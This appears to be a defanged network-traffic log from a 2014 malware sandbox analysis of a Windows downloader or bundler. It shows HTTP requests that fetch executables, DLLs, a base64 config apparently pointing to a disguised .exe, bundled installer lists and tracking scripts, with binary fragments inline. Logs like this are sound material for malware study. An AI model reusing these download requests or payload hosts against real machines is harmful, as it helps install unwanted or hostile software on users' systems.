x-bs-request-id: MTAuNDYuMjMxLjQwOjgwODA6MjcwNDI3OTU1MDoyOC9KdWwvMjAxNCAyMzowMDozOCA=<br>

x-bs-meta-crc32: 2839405489<br>

Content-MD5: c7062e404128917808756500d58121ee<br>

x-bs-client-ip: MTgwLjc2LjIyLjc5<br><pre>.C-5l...f.p`...r...F(N...f....:\....F.;.%.....q~S;..C".......lc .&l.D&<br>lt;...q'h... .j.......7.*x.j.p..0..L;2.....Ua"I.....I....M....Th7.nET\<br>/2e:.E*...s.........6...F.\.H...h~k6.BV;......9.~..."kd...Y.x..u...UP.<br>.....}{.Bj^..M...>....A.Tj.ea..m$...3./...fTo....ha...w.........,S.<br>6v.N..S.7.F....\?.)..S.... .k..).....}.wh>.1..f.Tr..LEI....5.?....i<br>.&s.....m-.?l.\)....;.pLFM;..........|XV..3J...[|G@...`.Y.8.LGz.z.U#.)<br>y.C.....v.o"...i....M.%..1.K....hW.._..A".-....3.....k.......2<b.S.<br>.....J.O.b4.....(!8.`..9...,[email protected]'r.Fc....B._.4......0.!.......Y`<br>...?...L...Q..... .N..}&/Vs......~z........c.O..E.E.cn@,.Y...."]M....=<br>G.N... .....Apc=Q......?.....<. .2.$......i.r... .|Y..[....c?.fm...<br>'.&.v.?B...F..r.-..qx].[Wk..!r./....z.q$kH.w.F.q..V.D.a......~]..-N.6.<br>..I.'.0..2K....mN$..K..r....xK.s...$..Lf."qr..#..%.O'..3I........T.=..<br>.A...y............uy0.5...P>.......I...elO..._3.q~..-.....d/um.*-..<br>9?.........k.%.1...t..P..d.0p.N....t......7..h..2.b.a....f.Y...F..*'..<br>.................iL..=f.Zj.........2;A'....lE(............K.d....a$D.l<br>......5...t..Ol.z.h.(..L.w.*OZD.b|.:.......u..U[.G...f.YVm.."......7..<br>..Ar....tq%..._.c.....=..C...].p.D.MJ..0....>!.}....uU..".m...P...z<br>..S..j.u.....-Ff..z..U..kNDi{.....|.....R....t..N.3.M..W.k....)t.#...Z<br>.I.5...C.P...nI..:..Q.........Fa.y...~Z.W0.'....L.....]*w..,....._... <br>.~....Q..........n.'.....(Dt...t..........c....W..pi..sZ..jaC.y....3..<br>...9.0S........./....8......y.n.HI.X@~...9.t._....r.R.........! .NQ...<br>.P. ..hb.t:."C..*.l........MsZW...:[email protected]#=sM.w...E..P.RwN.f</pre><<< skipped >>></font><br><br

<font color="red">GET /client/dllw5/BDLogicUtils.dll HTTP/1.1<br>

Accept: */*<br>

Accept-Language: zh-CN,zh,en-US<br>

Connection: Keep-Alive<br>

Host: dl1sw.baidu.com<br>

Referer: hXXp://dl1sw.baidu.com/<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

<br>

</font><br><font color="blue">HTTP/1.0 200 OK<br>

Expires: Tue, 09 Sep 2014 15:52:20 GMT<br>

Date: Sun, 10 Aug 2014 15:52:20 GMT<br>

Server: nginx<br>

Content-Type: application/octet-stream<br>

Content-Length: 924496<br>

Last-Modified: Tue, 06 May 2014 06:31:30 GMT<br>

Cache-Control: max-age=2592000<br>

Accept-Ranges: bytes<br>

Age: 556087<br>

Via: 1.0 hzh64:8104 (Cdn Cache Server V2.0), 1.0 sdbz23:8080 (Cdn Cache Server V2.0), 1.0 jg9:51020 (Cdn Cache Server V2.0)<br>

Connection: close<br>

Content-Disposition: attachment;filename="BDLogicUtils.dll"<br>

Access-Control-Allow-Origin: *<br>

Access-Control-Allow-Methods: GET,PUT,POST,DELETE,OPTIONS,HEAD<br><pre>MZ......................@.............................................<br>..!..L.!This program cannot be run in DOS mode....$.......V.h.........<br>......x.....5.{.....5.k.......Y.......[.............5.h.f...5.t.C...5.<br>|.....5.z.............5.~.....Rich............................PE..L...<br>\.hS...........!.........0.......;....................................<br>... ......................................`.......|........P..........<br>........P....`[email protected]...@.............<br>...............................text............................... ..`<br>.rdata..Z...........................@[email protected]............<br>[email protected].........@....... [email protected]......<br>.0..............@[email protected].......`.......@[email protected]..........<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>..................................................................</pre><<< skipped >>></font><br><br

<font color="red">GET /sw-search-sp/client2/ditch/25288850097/BDMZipNewForWs.dll HTTP/1.1<br>

Accept: */*<br>

Accept-Language: zh-CN,zh,en-US<br>

Connection: Keep-Alive<br>

Host: dlsw.baidu.com<br>

Range: bytes=21102592-<br>

Referer: hXXp://dlsw.baidu.com/<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

<br>

</font><br><font color="blue">HTTP/1.1 206 Partial Content<br>

Server: JSP3/2.0.0-b<br>

Date: Sun, 17 Aug 2014 02:21:11 GMT<br>

Content-Type: application/x-msdownload<br>

Content-Length: 4901712<br>

Connection: close<br>

ETag: c7062e404128917808756500d58121ee<br>

Last-Modified: Fri, 11 Jul 2014 14:29:11 GMT<br>

Expires: Mon, 18 Aug 2014 15:00:39 GMT<br>

Age: 127232<br>

Content-Range: bytes 21102592-26004303/26004304<br>

Access-Control-Allow-Origin: *<br>

Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE<br>

Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id<br>

Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length<br>

Accept-Ranges: bytes<br>

x-bs-version: DD1C492BA7010AF29AF13DA0A61E68AF<br>

x-bs-request-id: MTAuNDYuMjMxLjQwOjgwODA6MjcwNDI3OTU1MDoyOC9KdWwvMjAxNCAyMzowMDozOCA=<br>

x-bs-meta-crc32: 2839405489<br>

Content-MD5: c7062e404128917808756500d58121ee<br>

x-bs-client-ip: MTgwLjc2LjIyLjc5<br><pre>c...7..2........^*|.......cn.V..TD........]..o1.=E.cD.....(@.`7..tP..H<br>...}.....E...;...8..........\U'....._uP......Y\..j...}....DL...... .. <br>}..\.".PkM.!..:..IpV.9x..y..tX...C:].s.$w._r....JY..b.R.k......K.$}...<br>s.."?./.....(...{.Y%=......1.0aMDN{..0....V.gi!.?..m.@...'u..]gQ.>8<br>.:...1.o.{. .-|.l..{..=.[rMWXM.{V.d...m...#.:..rW..%@..W...e.cW.#..U..<br>U.e....j}.'n.....l<..-.c|cx.."..=.Z...-.w.......R..%......aU.....Va<br>ji..r.#i.$.8h|....R{H..Y.X..F>.w.g~...Y....z.....O-|r.SP.s......r.n<br>...0.....l...[9..0q.N..K...2....U....}.y..s.nG..."hL....*...;p..T...6E<br>D.r.i\........T..6.1..q...'PG!.QB2C.....S.z.ex...........N..g,...a..c.<br>...e.:..h.. e./0..o......b=.........{..E@....&T....2...k 2n........?..<br>...0R...H".....k.....y4_..kk.3O."...3.......qO2.....y.`X:..J........ey<br>[email protected]..../.l.GF...a,V..^..|.I.62....9L.8a.w.W..v'2.7o.S...:.3<br>.......M.-.... Q.=.0.9....vG......Hcn.4...z.....H.....IZ.....`...fU...<br>.&...<...#raTh...Y.MW..).......,.....{.....C!5r...1L......Y..H.l.2#<br>.......q.....B.R..B}.5V.e.%.p5.4...{...N<[email protected]..|.....6<<br>;...b?....y.CDX..c..u..i-..$..h .y~.TW"Is.Ha..GcMe.1.(...c.%........K.<br>...U.Z$..T<m.P.X.7.;...#...J...&....J.&."..}........t../......\rol.<br>....4*.......L........7Y..\....>.L...Nv.*...O.0..DDe..Z.F..N......K<br>......T..d..7..(d..u.F..II..k.'./.....R0..m.r.d...._.....a>).C....2<br>d.s.I.r..5.............yz...\`>k...n..3l\.....~.N.......R..D5.<.<br>.m...{............S.P...K..#y~'EFI.....].tO..b....L)...s.A..........&g<br>t;...R..-..VK.B.t..{....;.!.NX...Tk..{\...9....X.6.ac7....!...{...</pre><<< skipped >>></font><br><br

<font color="red">GET /0403/help1.html HTTP/1.0<br>

Host: update.aiqingzhihui.com<br>

User-Agent: NSISDL/1.2 (Mozilla)<br>

Accept: */*<br>

<br>

</font><br><font color="blue">HTTP/1.1 200 OK<br>

Date: Sun, 17 Aug 2014 02:21:11 GMT<br>

Content-Length: 654<br>

Content-Type: text/html<br>

Last-Modified: Fri, 11 Jul 2014 09:40:27 GMT<br>

Connection: Close<br>

ETag: "9884ea25ec9ccf1:4ee"<br>

Accept-Ranges: bytes<br>

Server: Microsoft-IIS/6.0<br>

X-Powered-By: ASP.NET<br>

Fw-Via: DISK HIT from ctl-hn-217-175.fcd<br><pre>TRW2VjdF0KOTc9MQo5OD0xCjk5PTEKMTAwPTEKMTAxPTEKMTAyPTEKMTAzPTEKMTA0PTEK<br>MTA1PTEKMTA2PTEKMTA3PTEKMTA4PTEKMTA5PTEKMTEwPTEKMTExPTEKMTEyPTEKMTEzPT<br>EKMTE0PTEKMTE1PTEKMTE2PTEKMTE3PTEKMTE4PTEKMTE5PTEKMTIwPTEKMTIxPTEKMTIy<br>PTEKMTIzPTEKMTI0PTEKMTI1PTEKMTI2PTEKMTI3PTEKMTI4PTEKMTI5PTEKMTMwPTEKMT<br>MxPTEKMTMyPTEKMTMzPTEKMTM0PTEKMTM1PTEKMTM2PTEKMTM3PTEKMTM4PTEKMTQxPTEK<br>MTQyPTEKW3JlY10KMD1odHRwOi8vZG93bi5sYW9jaGVoZS5jb20vMDYxOS9wanl5Xzg5Xz<br>MuZ2lmCltkaXJdCjA9cGp5eV84OV8zLmV4ZQpbZ10KMD0xCltwYV0KMD0xCltpMV0KMD0x<br>CltpMl0KMD3nvo7omJHlm6LotK0KW2kzXQowPWh0dHA6Ly93d3cubWVpbW90dWFuLmNvbS<br>9pY28uaWNvCltpNF0KMD1tbXQuaWNvCltpNV0KMD1odHRwOi8vd3d3Lm1laW1vdHVhbi5j<br>b20vP2FxMQpbZWRdCkUwPTE=..</pre></font><br><br

<font color="red">GET /stat.htm?id=2701879&r=&lg=en-us&ntime=none&cnzz_eid=1584515375-1408242084-&showp=1276x846&t=&h=1&rnd=1072095621 HTTP/1.1<br>

Accept: */*<br>

Referer: hXXp://tv.aiqingzhihui.com/zhibo2.html?id=pczh_107_306.exe&en=2014-8-17&go=<br>

Accept-Language: en-us<br>

Accept-Encoding: gzip, deflate<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

Host: hzs17.cnzz.com<br>

Connection: Keep-Alive<br>

<br>

</font><br><font color="blue">HTTP/1.1 200 OK<br>

Server: Tengine/1.4.1<br>

Date: Sun, 17 Aug 2014 02:21:25 GMT<br>

Content-Type: image/gif<br>

Content-Length: 43<br>

Last-Modified: Tue, 28 May 2013 02:57:17 GMT<br>

Connection: close<br>

Accept-Ranges: bytes<br><pre>GIF89a.............!.......,...........D..;..</pre></font><br><br

<font color="red">GET /downcontainer/downLoadList.do HTTP/1.1<br>

Accept: */*<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)<br>

Host: admin.downloader.re63.cn<br>

Cache-Control: no-cache<br>

<br>

</font><br><font color="blue">HTTP/1.1 200 OK<br>

Server: nginx<br>

Date: Sun, 17 Aug 2014 02:20:35 GMT<br>

Content-Type: text/html; charset=UTF-8<br>

Transfer-Encoding: chunked<br>

Connection: keep-alive<br>

Vary: Accept-Encoding<br><pre>2ef..<?xml version='1.0' encoding='UTF-8'?><setup><prod<br>uct id='0' oemId='0' name='guagua' companyName='......' productFullNam<br>e='......' version='5.1.4' /><product id='0' oemId='1' name='gua<br>gua' companyName='......' productFullName='......2' version='5.1.4' /&<br>gt;<product id='0' oemId='2' name='guagua' companyName='......' pro<br>ductFullName='......-............' version='5.1.4' /><product id<br>='0' oemId='3' name='guagua' companyName='......' productFullName='...<br>...-......-............' version='5.1.4' /><product id='0' oemId<br>='4' name='guagua' companyName='......' productFullName='......-......<br>-............' version='5.1.4' /><product id='0' oemId='5' name=<br>'guagua' companyName='......' productFullName='......-......-.........<br>...' version='5.1.4' /></setup>..0..</font>....</pre></font><br><br><font color="red">GET /downcontainer/downLoadForGuaGua.do?recid=77150006814 HTTP/1.1<br>

Accept: */*<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)<br>

Host: admin.downloader.re63.cn<br>

Cache-Control: no-cache<br>

<br>

</font><br><font color="blue">HTTP/1.1 200 OK<br>

Server: nginx<br>

Date: Sun, 17 Aug 2014 02:20:35 GMT<br>

Transfer-Encoding: chunked<br>

Connection: keep-alive<br><pre>3c8..<?xml version='1.0' encoding='UTF-8'?><setup productId='<br>0' oemId='0' productName='guagua' companyName='......' productFullName<br>='......' displayName='..................' version='5.1.4' licenseUrl=<br>'hXXp://VVV.guagua.cn/service/2109.html?id=1' installUrl='hXXp://img00<br>1.com/business/guagua.exe' installUrl2='null' execute='GuaGua\ChatHall<br>.exe'><homePage displayName='name' url='url' status='0'/><<br>lastimage url='hXXp://img001.com/tg_pic/mobo14-1-9.png'/><image <br>url='hXXp://img001.com/tg_pic/1.png'/><image url='hXXp://img001.<br>com/tg_pic/2.png'/><image url='hXXp://img001.com/tg_pic/3.png'/&<br>gt;<image url='hXXp://img001.com/tg_pic/4.png'/><image url='h<br>ttp://img001.com/tg_pic/5.png'/><rept url='hXXp://cj.guagua.cn/d<br>ownloader/' productName='guagua' version='514'/><recommendsetup <br>name='name'  url='url' status='0'/><recommendsetup name='name'  <br>url='url' status='0'/><recommendsetup name='name'  url='url' sta<br>tus='0'/><recommendsetup name='name'  url='url' status='0'/>&<br>lt;/setup>..0..HTTP/1.1 200 OK..Server: nginx..Date: Sun, 17 Aug 20<br>14 02:20:35 GMT..Transfer-Encoding: chunked..Connection: keep-alive..3<br>c8..<?xml version='1.0' encoding='UTF-8'?><setup productId='0<br>' oemId='0' productName='guagua' companyName='......' productFullName=<br>'......' displayName='..................' version='5.1.4' licenseUrl='<br>hXXp://VVV.guagua.cn/service/2109.html?id=1' installUrl='hXXp://img001<br>.com/business/guagua.exe' installUrl2='null' execute='GuaGua\ChatH</pre><<< skipped >>></font><br><br

<font color="red">GET /sw-search-sp/client2/ditch/25288850097/BDMZipNewForWs.dll HTTP/1.1<br>

Accept: */*<br>

Accept-Language: zh-CN,zh,en-US<br>

Connection: Keep-Alive<br>

Host: dlsw.baidu.com<br>

Range: bytes=21364736-<br>

Referer: hXXp://dlsw.baidu.com/<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

<br>

</font><br><font color="blue">HTTP/1.1 206 Partial Content<br>

Server: JSP3/2.0.0-b<br>

Date: Sun, 17 Aug 2014 02:21:13 GMT<br>

Content-Type: application/x-msdownload<br>

Content-Length: 4639568<br>

Connection: close<br>

ETag: c7062e404128917808756500d58121ee<br>

Last-Modified: Fri, 11 Jul 2014 14:29:11 GMT<br>

Expires: Mon, 18 Aug 2014 15:00:39 GMT<br>

Age: 127234<br>

Content-Range: bytes 21364736-26004303/26004304<br>

Access-Control-Allow-Origin: *<br>

Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE<br>

Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id<br>

Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length<br>

Accept-Ranges: bytes<br>

x-bs-version: DD1C492BA7010AF29AF13DA0A61E68AF<br>

x-bs-request-id: MTAuNDYuMjMxLjQwOjgwODA6MjcwNDI3OTU1MDoyOC9KdWwvMjAxNCAyMzowMDozOCA=<br>

x-bs-meta-crc32: 2839405489<br>

Content-MD5: c7062e404128917808756500d58121ee<br>

x-bs-client-ip: MTgwLjc2LjIyLjc5<br><pre>..'...m.r".(....?Xa/{p~T..-...W2.S,....%......-..m...8..D...x.*5..-'?.<br>.v.Z........M...1.~s..}O.P...mx..yb...U..* .). .yx.<.V...|..-......<br>09.U?^.....=....$.a"...s.ob....... ..<..q....-...............|..:..<br>..3..Q...$.2..l.q...O...e.Ar.PB.Tn....J3.A...D@,.Z.-....].....j.....P.<br> ,N..^l..N.N8.......J.z.n..'.]_I....`=...T.c#..d...Y?...r...p..\F.C..4<br>.V...j....0/..V82.o.<.J.F.C}..!B...JL...I....Z:.$[_.RbH.]b|..?*.|..<br>.-.r.....PA.wN.U/.sAu..h.w.l>...c..../\..l.ts...-...l..*v..K....V`u<br>.d....c..|..^cn^..5zf.1...s....q...t~VY.o*6.Ot......p....y..gGQ..|.h3.<br>../....GH.[....[...x....5....F..}..f..aT......7.Q.B.../a*....u}...y.%&<br>lt;.H...!s.......*....s%..q#.Y..#...z...)t.1S..U..[ uP%...U...........<br>..t.<....u..3......s..l..r....X~.g.TC..E....h&.3]....x.Cb.....=`o..<br>...~.^.a..%..~X..2O...#.Ij..G......-.2'...9EHA..l.*...~m....K...).^..)<br>.NW..pN!......6Ly...bo>..V.U..|.....6.i.._......=..........'.... ..<br>.UnPRk...."..Ji..K...CK W..y...W)h...........B.^....>...t$.t-.Q'#. <br>).!....7t"[email protected] a.Bs;.F1.Kh..G.GM''....i<.=.]j....~.<br>>..;..9.m..;..........5h[L.....o..K....O.W.. ..5....i..7.(-.^..-s..<br>..E..\..0..I.e..I..#?.......0....Q....W.......F....{..PE0...qQ...nef..<br>.u...K..E..G..k...09.O..=C...O..&Z.u..............~..Y..).-.....F).l..<br>............m...j.."..?^~.N.... m..~.|..c.x*!...T. :F{.....#.&.x.`.E.X<br>....{S.VA..*../y.FF4_/.......Q.M.......].-..4e[..EZ...gQ....g...).E...<br>.......l.%>.._..4.12X.......m>.5.....5..D..B$......d..3..&,..p.1<br>[email protected]....]....8%.y.9E..>..Vc.......Qr;d..V^_........)X.o</pre><<< skipped >>></font><br><br

<font color="red">GET /wwwww_3340.zip HTTP/1.0<br>

Host: yunbo.luopf.cn<br>

User-Agent: NSISDL/1.2 (Mozilla)<br>

Accept: */*<br>

<br>

</font><br><font color="blue">HTTP/1.1 200 OK<br>

Content-Length: 3591824<br>

Content-Type: application/x-zip-compressed<br>

Last-Modified: Thu, 12 Jun 2014 11:07:17 GMT<br>

Accept-Ranges: bytes<br>

ETag: "eae152792e86cf1:32d"<br>

Server: Microsoft-IIS/6.0<br>

Date: Sun, 17 Aug 2014 02:21:04 GMT<br>

Connection: close<br><pre>MZ......................@.............................................<br>..!..L.!This program cannot be run in DOS mode....$.......k.F./.(./.(.<br>/.(.......(.4...7.(.4...].(.4.....(.&...,.(.&...8.(./.)...(.4...$.(.4.<br>....(.4.....(.Rich/.(.........PE..L...S>.S.................6...z5..<br>[email protected]...@............<br>...................................4...........6.......6......R.......<br>.......................@[email protected]..........................<br>..text...H4.......6.................. ..`.rdata...V...P...X...:.......<br>.......@[email protected][email protected]<br>.................@[email protected]...>[email protected][email protected]......<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>..................................................U..j.h.BA.d.....P..h<br>.$.A.3..E.SVP.E.d......}..=`.A.3..]..G<...rA..G..rA..G..rA..G..rA..<br>G..sA..G,....f._0._2._4.G8...E..h.....G|..................q......E..E.<br>.;.t.P.h.....3..u..G4.Y....w8......E..M.;.t.P..v.....S.U.R.G.P.E......<br>]..]..]...TRA....M.d......Y^[.M.3..To....]...U.........$.A.3..E.h.....<br>.....j.P........3............Qj&j..............QA...u!............RP..<br>[email protected]. .W....?|..W.Rj.........x....<br>.....W......QP..u.......h.sA........S...h.rA....G....M.3..._.hn...</pre><<< skipped >>></font><br><br

<font color="red">GET /sw-search-sp/client2/common/patch/19035267599/BDMReport.dll HTTP/1.1<br>

Accept: */*<br>

Accept-Language: zh-CN,zh,en-US<br>

Connection: Keep-Alive<br>

Host: dlsw.baidu.com<br>

Range: bytes=524288-<br>

Referer: hXXp://xf.baidu.com<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

<br>

</font><br><font color="blue">HTTP/1.1 206 Partial Content<br>

Server: JSP3/2.0.0-b<br>

Date: Sun, 17 Aug 2014 02:20:31 GMT<br>

Content-Type: application/x-msdownload<br>

Content-Length: 683232<br>

Connection: close<br>

ETag: 30cbc602ada7cdfb0346038c05996d84<br>

Last-Modified: Wed, 30 Apr 2014 05:22:28 GMT<br>

Expires: Mon, 18 Aug 2014 14:59:38 GMT<br>

Age: 127253<br>

Content-Range: bytes 524288-1207519/1207520<br>

Access-Control-Allow-Origin: *<br>

Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE<br>

Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id<br>

Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length<br>

Accept-Ranges: bytes<br>

x-bs-version: DC8389F18378C004A7004B30F60323AD<br>

x-bs-request-id: MTAuNTcuMTIyLjM1OjgwODA6MjM1OTEyNDY2MzoyOC9KdWwvMjAxNCAyMjo1OTowNiA=<br>

x-bs-meta-crc32: 2965621797<br>

Content-MD5: 30cbc602ada7cdfb0346038c05996d84<br>

x-bs-client-ip: MTgwLjc2LjIyLjE3Mg==<br><pre>...|$..|$........K...t..C. ....;.r.......|$..S.9t..tX..u.......|$..v.;<br>w.u.......|$.;w.u.......D$H..;N.r.;w.u..z....V..D$H;.......;w.u..a....<br>6.L$H.V.Q.L$.RV...t$0......L$.j.....X...|$...~..G..8u..%....F.;C..D$$u<br>.......|$..d$..O...t..G. ....;.r.......O.9t..uC..t..G. ....;.r........<br>.G..T$$....T..t.......D$D.8.p..@.._^][..0....D$D.L$$_^]...H..@..[..0..<br>[email protected][email protected][email protected].......^......QV...F...t..L$..V.QV<br>RP..|...F.P.........F......F......F.....^Y..j.h....d.....P...VW..v..3.<br>P.D$.d........t$..~.........G.3..G..D$ .G..D$..D$.Pj..N..|$..5........<br>.F .F$...L$.d......Y_^..........V.t$.;.Wt..|$(W.\V..)~..D$..P..L$$...q<br>..T$....r....r..y..z..P..Q._.p.^.$........j.h ...d.....P...VW..v..3.P.<br>D$.d........t$..D$(.....~.........G.3..G..T$..D$ .G.Rj..N..D$..|$.....<br>.......F .F$...L$.d......Y_^..................j.h[...d.....P...VW..v..<br>3.P.D$.d........t$..D$(.....~....C....G.3..G..T$..D$ .G.Rj..N..D$..|$.<br>...........F .F$...L$.d......Y_^..................j.h....d.....P...VW.<br>.v..3.P.D$.d........t$..~.........G.3..G..D$ .G..D$..D$.Pj..N..|$..U..<br>.......F .F$...L$.d......Y_^..........j.h....d.....P...VW..v..3.P.D$.d<br>........t$..~.........G.3..G..D$ .G..D$..D$.Pj..N..|$............F .F$<br>...L$.d......Y_^..........j.h....d.....P...VW..v..3.P.D$.d........t$..<br>~.........G.3..G..D$ .G..D$..D$.Pj..N..|$............F .F$...L$.d.....<br>.Y_^..........j.h....d.....P...VW..v..3.P.D$.d........t$..~.........G.<br>3..G..D$ .G..D$..D$.Pj..N..|$............F .F$...L$.d......Y_^........<br>..SU.l$...V..t.;l$.t.......\$..D$ ;.t%.N.WSQP.0....T$ R...F.VPW.^x</pre><<< skipped >>></font><br><br

<font color="red">GET /stat.php?id=2701879&web_id=2701879 HTTP/1.1<br>

Accept: */*<br>

Referer: hXXp://tv.aiqingzhihui.com/zhibo2.html?id=pczh_107_306.exe&en=2014-8-17&go=<br>

Accept-Language: en-us<br>

Accept-Encoding: gzip, deflate<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

Host: s6.cnzz.com<br>

Connection: Keep-Alive<br>

<br>

</font><br><font color="blue">HTTP/1.1 200 OK<br>

Server: Tengine<br>

Date: Sun, 17 Aug 2014 02:21:24 GMT<br>

Content-Type: application/javascript<br>

Transfer-Encoding: chunked<br>

Connection: keep-alive<br>

Last-Modified: Sun, 17 Aug 2014 02:21:24 GMT<br>

Expires: Sun, 17 Aug 2014 03:51:24 GMT<br><pre>246a..(function(){function l(){this.c="2701879";this.O="z";this.K="";t<br>his.H="";this.J="";this.o="1408242084";this.M="hzs17.cnzz.com";this.I=<br>"";this.q="CNZZDATA" this.c;this.p="_CNZZDbridge_" this.c;this.C="_cnz<br>z_CV" this.c;this.s="0";this.v={};this.a={};this.ia()}function g(a,c){<br>try{var b=[];b.push("siteid=2701879");.b.push("name=" f(a.name));b.pus<br>h("msg=" f(a.message));b.push("r=" f(h.referrer));b.push("page=" f(d.l<br>ocation.href));b.push("agent=" f(d.navigator.userAgent));b.push("ex=" <br>f(c));b.push("rnd=" Math.floor(2147483648*Math.random()));(new Image).<br>src="hXXp://jserr.cnzz.com/log.php?" b.join("&")}catch(e){}}var h=docu<br>ment,d=window,f=encodeURIComponent,k=decodeURIComponent,p=unescape,q=e<br>scape;l.prototype={ia:function(){try{this.R(),this.G(),this.fa(),this.<br>D(),this.l(),this.da(),this.ca(),this.ga(),this.i(),.this.ba(),this.ea<br>(),this.ha(),this.$(),this.Y(),this.aa(),this.na(),d[this.p]=d[this.p]<br>||{},this.Z("_cnzz_CV")}catch(a){g(a,"i failed")}},la:function(){try{v<br>ar a=this;d._czc={push:function(){return a.w.apply(a,arguments)}}}catc<br>h(c){g(c,"oP failed")}},Y:function(){try{var a=d._czc;if("[object Arra<br>y]"==={}.toString.call(a))for(var c=0;c<a.length;c  ){var b=a[c];sw<br>itch(b[0]){case "_setAccount":d._cz_account="[object String]"==={}.toS<br>tring.call(b[1])?b[1]:String(b[1]);break;case "_setAutoPageview":"bool<br>ean"===.typeof b[1]&&(d._cz_autoPageview=b[1])}}}catch(e){g(e,"cS fail<br>ed")}},na:function(){try{if("undefined"===typeof d._cz_account||d._cz_<br>account===this.c){d._cz_account=this.c;if("[object Array]"==={}.to</pre><<< skipped >>></font><br><br

<font color="red">GET /core.php?web_id=2701879&t=z HTTP/1.1<br>

Accept: */*<br>

Referer: hXXp://tv.aiqingzhihui.com/zhibo2.html?id=pczh_107_306.exe&en=2014-8-17&go=<br>

Accept-Language: en-us<br>

Accept-Encoding: gzip, deflate<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

Host: c.cnzz.com<br>

Connection: Keep-Alive<br>

<br>

</font><br><font color="blue">HTTP/1.1 200 OK<br>

Server: Tengine<br>

Date: Sun, 17 Aug 2014 02:21:25 GMT<br>

Content-Type: application/javascript<br>

Transfer-Encoding: chunked<br>

Connection: keep-alive<br>

Last-Modified: Sun, 17 Aug 2014 02:21:25 GMT<br>

Expires: Sun, 17 Aug 2014 02:36:25 GMT<br><pre>2ef..!function(){var p,q,r,a=encodeURIComponent,b="2701879",c="",d="",<br>e="online_v3.php",f="hzs17.cnzz.com",g="1",h="text",i="z",j="站&<br>#38271;统计",k=window["_CNZZDbridge_" b].bobject,l="http:"<br>,m="0",n=l "//online.cnzz.com/online/" e,o=[];o.push("id=" b),o.push("<br>h=" f),o.push("on=" a(d)),o.push("s=" a(c)),n ="?" o.join("&"),"0"===m<br>&&k.callRequest([l "//cnzz.mmstat.com/9.gif?abc=1"]),g&&(""!==d?k.crea<br>teScriptIcon(n,"utf-8"):(q="z"==i?"hXXp://VVV.cnzz.com/stat/website.ph<br>p?web_id=" b:"hXXp://quanjing.cnzz.com","pic"===h?(r=l "//icon.cnzz.co<br>m/img/" c ".gif",p="<a href='" q "' target=_blank title='" j "'><br><img border=0 hspace=0 vspace=0 src='" r "'></a>"):p="<<br>a href='" q "' target=_blank title='" j "'>" j "</a>",k.creat<br>eIcon([p])))}();..0..HTTP/1.1 200 OK..Server: Tengine..Date: Sun, 17 A<br>ug 2014 02:21:25 GMT..Content-Type: application/javascript..Transfer-E<br>ncoding: chunked..Connection: keep-alive..Last-Modified: Sun, 17 Aug 2<br>014 02:21:25 GMT..Expires: Sun, 17 Aug 2014 02:36:25 GMT..2ef..!functi<br>on(){var p,q,r,a=encodeURIComponent,b="2701879",c="",d="",e="online_v3<br>.php",f="hzs17.cnzz.com",g="1",h="text",i="z",j="站长ń<br>79;计",k=window["_CNZZDbridge_" b].bobject,l="http:",m="0",n=l "<br>//online.cnzz.com/online/" e,o=[];o.push("id=" b),o.push("h=" f),o.pus<br>h("on=" a(d)),o.push("s=" a(c)),n ="?" o.join("&"),"0"===m&&k.callRequ<br>est([l "//cnzz.mmstat.com/9.gif?abc=1"]),g&&(""!==d?k.createScriptIcon<br>(n,"utf-8"):(q="z"==i?"hXXp://VVV.cnzz.com/stat/website.php?web_id</pre><<< skipped >>></font><br><br

<font color="red">GET /sw-search-sp/client2/common/patch/19562458020/BDLogicUtils.dll HTTP/1.1<br>

Accept: */*<br>

Accept-Language: zh-CN,zh,en-US<br>

Connection: Keep-Alive<br>

Host: dlsw.baidu.com<br>

Range: bytes=491520-<br>

Referer: hXXp://xf.baidu.com<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

<br>

</font><br><font color="blue">HTTP/1.1 206 Partial Content<br>

Server: JSP3/2.0.0-b<br>

Date: Sun, 17 Aug 2014 02:20:28 GMT<br>

Content-Type: application/x-msdownload<br>

Content-Length: 432976<br>

Connection: close<br>

